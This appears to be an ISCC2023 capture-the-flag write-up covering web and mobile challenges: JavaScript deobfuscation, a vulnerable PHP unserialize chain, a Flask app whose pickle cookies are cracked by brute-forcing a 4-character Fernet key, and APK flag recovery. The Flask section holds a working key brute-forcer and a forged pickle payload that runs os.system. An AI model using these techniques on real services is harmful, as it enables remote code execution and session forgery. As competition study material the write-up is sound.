
ISCC2023

https://kjd3xtsq9r.feishu.cn/docs/doccnyU9DQVNEIhvjc72lMc2yq3#EizBUz

WEB

羊了个羊

https://raw.githubusercontent.com/githubmof/Img/main/img/202305072232150.png#id=S7CgZ&originHeight=95&originWidth=524&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=

U1ZORFEzczJkR3BvZWpsdVlrWk9WMWd5ZGpOa05VTTFORGRwTTIweFRFRktVRWwzVFgwPQ==
对上面的字符串连续做两次 base64 解码,得到:
ISCC{6tjhz9nbFNWX2v3d5C547i3m1LAJPIwM}

Where_is_your_love

vue.js

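/**
 * Decode the page's "%xx" obfuscation. The input is read in three-character
 * groups ("%" plus two digits); each two-digit pair is parsed as a base-14
 * number (digits 0-9 and a-d) and becomes one UTF-16 code unit.
 *
 * The "%" itself is never checked: the characters at offsets 0, 3, 6, ... are
 * simply skipped. A pair that does not start with a base-14 digit parses to
 * NaN, which String.fromCharCode turns into "\u0000".
 *
 * When analysing an obfuscated page, print the return value
 * (for example console.log(decode(s))) instead of handing it to eval(), so the
 * hidden script can be read without being executed.
 *
 * @param {string} str obfuscated text
 * @returns {string} decoded text
 */
function decode(str){
  var result="";
  // `var i` keeps the counter local. The original assigned an undeclared `i`,
  // which creates a global in sloppy mode and throws in strict mode.
  for(var i=1;i<str.length;i+=3){
    // substr() already returns a string, so the former .toString(2) was a no-op.
    result+=String.fromCharCode(parseInt(str.substr(i,2),14));
  }
  return result;
}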

eval(decode("%72%7d%71%85%7b%73%7c%84%34%87%82%77%84%73%2c%72%73%71%7d%72%73%2c%26%29%3a%3a%29%3d%38%29%3d%3d%29%40%3c%29%38%3a%29%3d%3d%29%3d%38%29%3a%3b%29%38%3c%29%3b%39%29%3b%72%29%3a%70%29%3a%70%29%39%3d%29%38%3c%29%38%3a%29%40%39%29%40%3a%29%40%41%29%3d%6d%29%3d%39%29%3a%3b%29%38%3c%29%40%36%29%3d%72%29%40%39%29%3d%3d%29%40%3a%29%3d%3d%29%3d%72%29%3d%71%29%3a%38%29%3c%72%29%3d%36%29%40%39%29%3d%72%29%3d%6d%29%40%3b%29%40%3a%29%3d%39%29%3a%39%29%3d%6d%29%3d%39%29%3d%3a%29%40%3a%29%3a%38%29%39%40%29%39%3c%29%39%3c%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%70%29%3d%72%29%40%3b%29%40%39%29%3d%39%29%3d%70%29%3d%72%29%40%3c%29%3d%39%29%3a%3b%29%38%3c%29%3d%39%29%40%39%29%3d%37%29%3d%38%29%40%3c%29%38%71%29%38%72%29%38%3c%29%3a%3c%29%3a%3a%29%3d%3d%29%3d%71%29%40%36%29%40%3b%29%40%3a%29%38%3a%29%3d%3d%29%3d%38%29%3a%3b%29%38%3c%29%3d%36%29%40%3b%29%40%3a%29%38%3c%29%38%3a%29%40%3a%29%40%41%29%40%36%29%3d%39%29%3a%3b%29%38%3c%29%3d%36%29%40%3b%29%40%3a%29%40%3a%29%3d%72%29%3d%71%29%38%3c%29%38%3a%29%40%3c%29%3c%72%29%3d%6d%29%40%3b%29%3d%39%29%3a%3b%29%38%3c%29%3d%37%29%3d%6d%29%3d%3d%29%3d%37%29%3d%41%29%38%3a%29%3d%70%29%3d%39%29%38%3b%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%3a%29%3d%72%29%3d%37%29%40%3b%29%40%39%29%3a%3b%29%38%3c%29%3d%71%29%3d%72%29%3d%41%29%40%36%29%38%71%29%38%72%29%3a%39%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%37%29%3d%6d%29%3d%3d%29%3d%37%29%3d%41%29%3a%3b%29%38%3c%29%40%3d%29%3d%3d%29%3d%71%29%3d%38%29%3d%72%29%40%3d%29%39%3a%29%3d%6d%29%3d%72%29%3d%37%29%3c%72%29%40%3a%29%3d%3d%29%3d%72%29%3d%71%29%3a%3b%29%38%70%29%3a%71%29%3d%72%29%40%3d%29%3d%71%29%3d%6d%29%3d%72%29%3c%72%29%3d%38%29%39%3a%29%40%36%29%3d%3c%29%40%36%29%38%70%29%3a%39%29%38%3c%29%3a%3c%29%3a%3a%29%39%3b%29%3d%38%29%3d%3d%29%40%3c%29%3a%3c%26%2d%2d"));
eval(decode("%72%7d%71%85%7b%73%7c%84%34%87%82%77%84%73%2c%72%73%71%7d%72%73%2c%26%29%3a%3a%29%3d%38%29%3d%3d%29%40%3c%29%38%3a%29%3d%3d%29%3d%38%29%3a%3b%29%38%3c%29%3b%39%29%3b%72%29%3a%70%29%3a%70%29%39%40%29%38%3c%29%38%3a%29%40%39%29%40%3a%29%40%41%29%3d%6d%29%3d%39%29%3a%3b%29%38%3c%29%40%36%29%3d%72%29%40%39%29%3d%3d%29%40%3a%29%3d%3d%29%3d%72%29%3d%71%29%3a%38%29%3c%72%29%3d%36%29%40%39%29%3d%72%29%3d%6d%29%40%3b%29%40%3a%29%3d%39%29%3a%39%29%3d%6d%29%3d%39%29%3d%3a%29%40%3a%29%3a%38%29%39%71%29%39%3c%29%39%3c%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%70%29%3d%72%29%40%3b%29%40%39%29%3d%39%29%3d%70%29%3d%72%29%40%3c%29%3d%39%29%3a%3b%29%38%3c%29%3d%39%29%40%39%29%3d%37%29%3d%70%29%40%3c%29%38%71%29%38%72%29%38%3c%29%3a%3c%29%3a%3a%29%3d%3d%29%3d%71%29%40%36%29%40%3b%29%40%3a%29%38%3a%29%3d%3d%29%3d%38%29%3a%3b%29%38%3c%29%3d%36%29%40%3b%29%40%3a%29%39%3d%29%38%3c%29%38%3a%29%40%3a%29%40%41%29%40%36%29%3d%39%29%3a%3b%29%38%3c%29%3d%36%29%40%3b%29%40%3a%29%40%3a%29%3d%72%29%3d%71%29%38%3c%29%38%3a%29%40%3c%29%3c%72%29%3d%6d%29%40%3b%29%3d%39%29%3a%3b%29%38%3c%29%3d%3a%29%3d%72%29%3d%6d%29%3d%6d%29%3d%72%29%40%3d%29%38%3a%29%3d%70%29%3d%39%29%38%3b%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%3a%29%3d%72%29%3d%37%29%40%3b%29%40%39%29%3a%3b%29%38%3c%29%3d%71%29%3d%72%29%3d%41%29%40%36%29%38%71%29%38%72%29%3a%39%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%37%29%3d%6d%29%3d%3d%29%3d%37%29%3d%41%29%3a%3b%29%38%3c%29%40%3d%29%3d%3d%29%3d%71%29%3d%38%29%3d%72%29%40%3d%29%39%3a%29%3d%6d%29%3d%72%29%3d%37%29%3c%72%29%40%3a%29%3d%3d%29%3d%72%29%3d%71%29%3a%3b%29%38%70%29%3a%72%29%3d%71%29%3d%37%29%39%3a%29%40%36%29%3d%3c%29%40%36%29%38%70%29%3a%39%29%38%3c%29%39%3b%29%3a%3c%29%3a%3a%29%39%3b%29%3d%38%29%3d%3d%29%40%3c%29%3a%3c%26%2d%2d"));
eval(decode("%72%7d%71%85%7b%73%7c%84%34%87%82%77%84%73%2c%72%73%71%7d%72%73%2c%26%29%3a%3a%29%3d%38%29%3d%3d%29%40%3c%29%38%3a%29%3d%3d%29%3d%38%29%3a%3b%29%38%3c%29%3b%39%29%3b%72%29%3a%70%29%3a%70%29%39%41%29%38%3c%29%38%3a%29%40%39%29%40%3a%29%40%41%29%3d%6d%29%3d%39%29%3a%3b%29%38%3c%29%40%36%29%3d%72%29%40%39%29%3d%3d%29%40%3a%29%3d%3d%29%3d%72%29%3d%71%29%3a%38%29%3c%72%29%3d%36%29%40%39%29%3d%72%29%3d%6d%29%40%3b%29%40%3a%29%3d%39%29%3a%39%29%3d%6d%29%3d%39%29%3d%3a%29%40%3a%29%3a%38%29%3a%36%29%39%3c%29%39%3c%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%70%29%3d%72%29%40%3b%29%40%39%29%3d%39%29%3d%70%29%3d%72%29%40%3c%29%3d%39%29%3a%3b%29%38%3c%29%3d%39%29%40%39%29%3d%37%29%40%39%29%40%3d%29%38%71%29%38%72%29%38%3c%29%3a%3c%29%3a%3a%29%3d%3d%29%3d%71%29%40%36%29%40%3b%29%40%3a%29%38%3a%29%3d%3d%29%3d%38%29%3a%3b%29%38%3c%29%3d%36%29%40%3b%29%40%3a%29%39%40%29%38%3c%29%38%3a%29%40%3a%29%40%41%29%40%36%29%3d%39%29%3a%3b%29%38%3c%29%3d%36%29%40%3b%29%40%3a%29%40%3a%29%3d%72%29%3d%71%29%38%3c%29%38%3a%29%38%3a%29%40%3c%29%3c%72%29%3d%6d%29%40%3b%29%3d%39%29%3a%3b%29%38%3c%29%3d%6d%29%3d%72%29%3d%72%29%3d%41%29%38%3a%29%3d%70%29%3d%39%29%38%3b%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%3a%29%3d%72%29%3d%37%29%40%3b%29%40%39%29%3a%3b%29%38%3c%29%3d%71%29%3d%72%29%3d%41%29%40%36%29%38%71%29%38%72%29%3a%39%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%37%29%3d%6d%29%3d%3d%29%3d%37%29%3d%41%29%3a%3b%29%38%3c%29%40%3d%29%3d%3d%29%3d%71%29%3d%38%29%3d%72%29%40%3d%29%39%3a%29%3d%6d%29%3d%72%29%3d%37%29%3c%72%29%40%3a%29%3d%3d%29%3d%72%29%3d%71%29%3a%3b%29%38%70%29%3b%3c%29%3d%72%29%40%3c%29%3d%39%29%3b%72%29%40%3a%29%3d%72%29%40%38%29%40%41%29%39%3a%29%40%36%29%3d%3c%29%40%36%29%38%70%29%3a%39%29%38%3c%29%39%3b%29%3a%3c%29%3a%3a%29%39%3b%29%3d%38%29%3d%3d%29%40%3c%29%3a%3c%26%2d%2d"));
eval(decode("%7d%70%78%45%72%7d%71%85%7b%73%7c%84%34%75%73%84%4d%7a%73%7b%73%7c%84%4a%89%53%72%2c%26%53%5d%4b%4b%37%26%2d%43%72%7d%71%85%7b%73%7c%84%34%7d%7c%7b%7d%85%83%73%7b%7d%86%73%45%73%83%71%72%86%43%72%7d%71%85%7b%73%7c%84%34%7d%7c%79%73%89%80%82%73%83%83%45%7c%7d%79%80%43%7d%70%78%34%83%84%89%7a%73%34%7a%73%74%84%45%33%38%36%36%43%7d%70%78%34%83%84%89%7a%73%34%84%7d%80%45%33%38%36%36%43%86%6d%82%24%77%45%36%32%6d%88%45%36%32%6d%89%45%38%36%36%32%83%87%45%37%32%82%45%39%36%36%43%72%7d%71%85%7b%73%7c%84%34%75%73%84%4d%7a%73%7b%73%7c%84%4a%89%53%72%2c%2b%53%5d%4b%4b%37%2b%2d%34%83%84%89%7a%73%34%84%7d%80%45%33%3b%3b%36%43%72%7d%71%85%7b%73%7c%84%34%7d%7c%71%7d%7c%84%73%88%84%7b%73%7c%85%45%7c%7d%79%80%43%72%7d%71%85%7b%73%7c%84%34%7d%7c%83%73%7a%73%71%84%83%84%6d%82%84%45%7c%7d%79%80%43%72%7d%71%85%7b%73%7c%84%34%7d%7c%72%82%6d%75%83%84%6d%82%84%45%7c%7d%79%80%43"));
eval(decode("%87%77%7c%45%72%7d%71%85%7b%73%7c%84%34%75%73%84%4d%7a%73%7b%73%7c%84%4a%89%53%72%2c%26%53%5d%4b%4b%38%26%2d%43"));
eval(decode("%83%7d%82%45%72%7d%71%85%7b%73%7c%84%34%75%73%84%4d%7a%73%7b%73%7c%84%4a%89%53%72%2c%26%53%5d%4b%4b%39%26%2d"));

得到

> "<div id="ISCC1" style="position:absolute;left:200" onmousemove="escdv()"><input id="but" type="button" value="click me!" onfocus="nokp();" onclick="window.location='Download.php';"></div>"
> "<div id="ISCC2" style="position:absolute;left:600" onmousemove="escmv()"><input id="but1" type="button" value="follow me!" onfocus="nokp();" onclick="window.location='Enc.php';"/></div>"
> "<div id="ISCC3" style="position:absolute;left:800" onmousemove="escsw()"><input id="but2" type="button"  value="look me!" onfocus="nokp();" onclick="window.location='LoveStory.php';"/></div>"

Download.php ==> keyiscc.pem

Enc.php ==> letter.php

LoveStory.php

?> <?php
include("./xxxiscc.php");
/**
 * Holds one public property, $like, and defines two magic methods that act
 * on it.
 *
 * Neither method checks what $like contains. When an instance is produced by
 * unserialize(), $like is whatever the serialized string says it is.
 */
class boy {
    public $like;
    // PHP calls __destruct() automatically when the object is destroyed,
    // which includes objects that were created by unserialize().
    public function __destruct() {
        echo "能请你喝杯奶茶吗?<br>";
        // Calls make_friends() on $like; the leading @ silences PHP
        // diagnostics for this call.
        @$this->like->make_friends();
    }
    // Invoked whenever the object is used as a string (for example by echo).
    public function __toString() {
        echo "拱火大法好<br>";
        // Reads the `string` property of $like and returns it as the result.
        return $this->like->string;
    }
}

/**
 * Turns any call to an undefined or inaccessible method into an isset()
 * probe on the private $boyname property.
 */
class girl {
    private $boyname;
    // __call() runs when a method that does not exist (or is not accessible)
    // is invoked on the object; $func and $args are ignored here.
    public function __call($func, $args) {
        echo "我害羞羞<br>";
        // The result is discarded. If $boyname holds an object whose `name`
        // property is inaccessible from here, PHP calls that object's
        // __isset() handler.
        isset($this->boyname->name);  
    }
}

/**
 * Stores a value in the private $string property and defines __isset() and
 * __get() handlers for access to its inaccessible properties.
 *
 * unserialize() does not run __construct(), so on an instance built that way
 * both private properties hold whatever the serialized string supplied.
 */
class helper {
    private $name;
    private $string;
    public function __construct($string) {
        $this->string = $string;
    }
    // Runs when isset()/empty() is applied to an inaccessible property.
    public function __isset($val) {
        echo "僚机上线<br>";
        // echo converts $name to a string; an object stored there has its
        // __toString() called.
        echo $this->name;
    }
    // Runs when an inaccessible property is read from outside the class.
    public function __get($name) {
        echo "僚机不懈努力<br>";
        // Looks up the property named by $name, indexes it with the same
        // name and calls the element as a function.
        // NOTE(review): a dynamic call on property data is unsafe on any
        // object that can be built by unserialize(); restrict such calls to
        // a fixed set of known callables.
        $var = $this->$name;
        $var[$name]();
    }
}
/**
 * Prints the global $flag when the object carries a matching property.
 */
class love_story {
    public function love() {
        echo "爱情萌芽<br>";
        // array_walk() over an object visits its properties: the callback
        // receives each property value ($make) and property name ($colo).
        array_walk($this, function($make, $colo){
            echo "坠入爱河,给你爱的密码<br>";
            // Both comparisons are strict: element 0 of the value and the
            // property name must equal these literals exactly.
            if ($make[0] === "girl_and_boy" && $colo === "fall_in_love") {
                // $flag is not defined in this listing; presumably it comes
                // from the included ./xxxiscc.php.
                global $flag;
                echo $flag;
            }
        });
    }
}

// Request entry point. With ?iscc=... the raw query value is passed to
// unserialize(); without it the script prints its own source.
// NOTE(review): unserialize() on request data lets the client decide which
// loaded classes are instantiated and what their properties contain, and the
// magic methods of those classes then run on that data. For untrusted input
// use json_decode(), or at minimum pass ['allowed_classes' => false].
if (isset($_GET["iscc"])) {
    $a=unserialize($_GET['iscc']);
} else {
    highlight_file(__FILE__);
}

上大号说话

输入 马保国,提示有东西在.git下

app.py.bak

class ED:
    """Wraps a Fernet cipher whose key is derived from ``file_key``.

    NOTE(review): the Fernet key is only as strong as ``file_key``. The 28
    trailing bytes added by ``generate_key`` are constant, so a short
    ``file_key`` leaves the key guessable offline from a single token. A
    random key from ``Fernet.generate_key()`` (or a real KDF over a
    high-entropy secret) avoids that.
    """

    def __init__(self):
        # The value is elided in the recovered backup; only the trailing
        # comment survives.
        self.file_key = ...  # 1Aa
        self.cipher_suite = Fernet(self.generate_key(self.file_key))

    def crypto(self, base_str):
        """Encrypt ``base_str`` with the instance's Fernet cipher and return the token."""
        return self.cipher_suite.encrypt(base_str)

    @staticmethod
    def generate_key(key: str):
        """Return the urlsafe-base64 encoding of ``key`` bytes followed by 28 ASCII ``'0'`` bytes."""
        key_byte = key.encode()
        # Fernet needs 32 key bytes; presumably ``key`` is 4 bytes long so the
        # padded value reaches that length -- TODO confirm.
        return base64.urlsafe_b64encode(key_byte + b'0' * 28)


def check_cookies(cookie):
    """Decrypt the cookie value, unpickle it and compare it with ``mabaoguo``.

    Returns ``flag`` when the unpickled object's ``name``, ``random`` and
    ``gongfu`` match, the object's ``name`` otherwise, and ``False`` when the
    header check fails or any exception is raised. Parts of the function are
    elided (``...``) in the recovered backup.

    NOTE(review): ``pickle.loads`` runs on bytes that the client stores and
    sends back. A pickle stream can make the loader import and call objects,
    so the header check below and a deny-list are not a safe boundary; the
    only real barrier is the Fernet key. A data-only format such as signed
    JSON, protected by a strong random key, removes the risk.
    """
    ed = ED()
    # NOTE(review): ``decrypto`` is not part of the ED class shown in this
    # listing; it apparently returns a pair here -- confirm against the full file.
    f, result = ed.decrypto(cookie)
    black_list = ...
    # Accept only streams that start with the pickle protocol-3 header.
    if not result[0:2] == b'\x80\x03':
        return False
    ...
    try:
        result = pickle.loads(result)
        if result.name == 'mabaoguo' and result.random == mabaoguo.random and result.gongfu == mabaoguo.gongfu:
            return flag
        else:
            return result.name
    # Bare except: every failure, including unexpected ones, is reported as False.
    except:
        return False


@app.route('/', methods=['GET', 'POST'])
def index():
    """Handle ``/``: a POST stores the submitted name in an encrypted pickle cookie, a GET evaluates that cookie.

    The rest of the GET branch is elided (``...``) in the recovered backup.
    """
    if request.method == 'POST':
        name = request.form['input_field']
        name = Member(name)
        # Serialise the Member object with pickle protocol 3, then let
        # pickletools.optimize() drop unused PUT opcodes before encryption.
        name_pick = pickle.dumps(name, protocol=3)
        name_pick = pickletools.optimize(name_pick)
        ed = ED()
        response = make_response(redirect('/'))
        # NOTE(review): the client-held state is a pickle protected only by
        # ED's key, and no cookie attributes (httponly/secure/samesite) are
        # passed here.
        response.set_cookie('name', ed.crypto(name_pick).decode())
        return response

    temp_cookies = request.cookies.get('name')

    if not temp_cookies:
        ...
    else:
        f = check_cookies(temp_cookies)
        ...


# Calls app.run() with no arguments when the file is executed as a script
# (presumably Flask's built-in development server -- not meant for production).
if __name__ == '__main__':
    app.run()

通过cookie爆破得到file_key:file_key 只有 4 个字符,其余 28 字节是固定的 '0' 填充,因此拿到一个 cookie 后即可离线穷举。

import string
import base64
from cryptography.fernet import Fernet

# Candidate alphabet: digits 1-9 plus A-Z and a-z (61 symbols; '0' is not included).
dic = [str(i) for i in range(1, 10)]
le = string.ascii_uppercase + string.ascii_lowercase
for i in le:
    dic.append(i)

# A Fernet token, presumably the value of the `name` cookie set by the application.
cookie = 'gAAAAABkYiDhLxAZVVyExYlvynjNlizOuHxA3piriLZIQ-gomirHUqdO0ILiMAnI1rmV-k_A8AIue9-2rBh8k9oDLOSsHDFi8vAcHDIrygVheRny82F_jGGjRjlAnptQd0TFFNJI-pn-9-Pyzn3gUXoPxCSxeST0iVJ9MXQgb5WpMb5KsglbmPY='

# Every 4-symbol file_key is tried (61**4 = 13,845,841 candidates). The search
# is feasible only because the key is built from 4 characters plus constant
# padding; a key from Fernet.generate_key() could not be enumerated this way.
for i1 in dic:
    for i2 in dic:
        for i3 in dic:
            for i4 in dic:
                file_key = i1 + i2 + i3 + i4
                # Same derivation as generate_key() in app.py.bak.
                cipher_suite = Fernet(base64.urlsafe_b64encode(file_key.encode() + b'0' * 28))
                try:
                    # Fernet authenticates the token, so decrypt() raises for a wrong key.
                    name_pick = cipher_suite.decrypt(cookie)                    
                    print(name_pick) # b'\x80\x03c__main__\nMember\n)\x81}(X\x04\x00\x00\x00nameX\x08\x00\x00\x00mabaoguoX\x06\x00\x00\x00randomX\x0f\x00\x00\x00orfszdjckabphxlub.'
                    print(file_key) # 5MbG
                    # Pause on a key that verifies.
                    input()
                # Bare except: any failure moves on to the next candidate.
                except:
                    continue

pickle反序列化外带结果

奇安信攻防社区-pickle反序列化深入python源码分析 (butian.net)

class ED:
    """Fernet helper with the same key derivation as app.py.bak and the recovered ``file_key`` filled in."""

    def __init__(self):
        self.file_key = "5MbG"  # 1Aa
        derived = self.generate_key(self.file_key)
        self.cipher_suite = Fernet(derived)

    def crypto(self, base_str):
        """Return the Fernet token for ``base_str``."""
        token = self.cipher_suite.encrypt(base_str)
        return token

    def decrypto(self, base_str):
        """Return the plaintext carried by the Fernet token ``base_str``."""
        plain = self.cipher_suite.decrypt(base_str)
        return plain

    @staticmethod
    def generate_key(key: str):
        """Return ``key`` bytes followed by 28 ASCII ``'0'`` bytes, urlsafe-base64 encoded."""
        padding = b'0' * 28
        raw = key.encode() + padding
        return base64.urlsafe_b64encode(raw)

# Hand-written protocol-3 pickle stream; {命令} ("command") is the author's placeholder.
# NOTE(review): this is why pickle.loads() must never see client-held data: a
# stream can name importable callables and have the loader invoke them. A
# header check and a deny-list are not a sound defence. Keep cookie contents
# data-only (for example signed JSON) and use a randomly generated key.
result = b'\x80\x03cbuiltins\nmap\n(cos\nsystem\n(V{命令}\ntt\x81p0\n0cbuiltins\nbytes\n(g0\nt\x81.'

# Encrypt the stream with the ED helper and print the resulting token.
ed=ED()
base=ed.crypto(result).decode()
print(base)

MOBILE

NOJAVA

apk反编译

apk 反编译(使用apktool、dex2jar、jd-gui,进行反编译apk,查看apk源码)_villen_t的博客-CSDN博客

获取资源

apktool

java -jar .\apktool_2.7.0.jar d -f attachment-21.apk -o MMTS

获取代码

dex2jar-2.0 + jd-gui

.\d2j-dex2jar.bat .\classes.dex

得到.\classes-dex2jar.jar

jd-gui打开

com/example.nojava/MainActivity.class

 /**
  * Decompiled flag check: accepts the input only when it is longer than six
  * characters, starts with "ISCC{", ends with '}' and the result of
  * E.j(input) equals a hard-coded string.
  *
  * E.h() and E.j() are not part of this listing, so the transformation is not
  * visible here. Because the expected value ships inside the APK, anyone who
  * can read the package can recover it; a client-side comparison like this
  * does not keep a secret.
  */
 private final boolean B(String paramString) {
    if (paramString.length() <= 6)
      return false; 
    String str = paramString.substring(0, 5);
    // Kotlin null-check call; the message text appears truncated by the decompiler.
    Intrinsics.checkNotNullExpressionValue(str, "this as java.lang.StringendIndex)");
    if (Intrinsics.areEqual(str, "ISCC{") && paramString.charAt(paramString.length() - 1) == '}') {
      E e = new E();
      e.h();
      // The whole input, including the "ISCC{" prefix and the closing brace, is passed to E.j().
      if (Intrinsics.areEqual(e.j(paramString), "efZYiiYejYefjjejjZfYjije"))
        return true; 
    } 
    return false;
  }

或者jadx gui直接apk反编译

exp.py

import libnum #

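# Expected string from the comparison in the decompiled MainActivity.B().
s = 'efZYiiYejYefjjejjZfYjije'
s = libnum.s2n(s)
a = bin(s)[2:]
# Left-pad to a whole number of 4-bit groups. (-len) % 4 adds nothing when the
# length is already a multiple of 4; the previous expression prepended a
# spurious '0000' group in that case, which then hit the "waaa" branch.
a = '0' * (-len(a) % 4) + a
a = [a[i:i + 4] for i in range(0, len(a), 4)]
# Each 4-bit group stands for two output bits.
NIBBLE_TO_BITS = {"1001": "10", "0110": "01", "1010": "11", "0101": "00"}
payload = ""
for i in a:
    bits = NIBBLE_TO_BITS.get(i)
    if bits is None:
        # Group outside the code table: report it and keep going.
        print("waaa")
    else:
        payload += bits

print(payload)
print('ISCC{' + libnum.n2s(int(payload, 2)).decode() + '}')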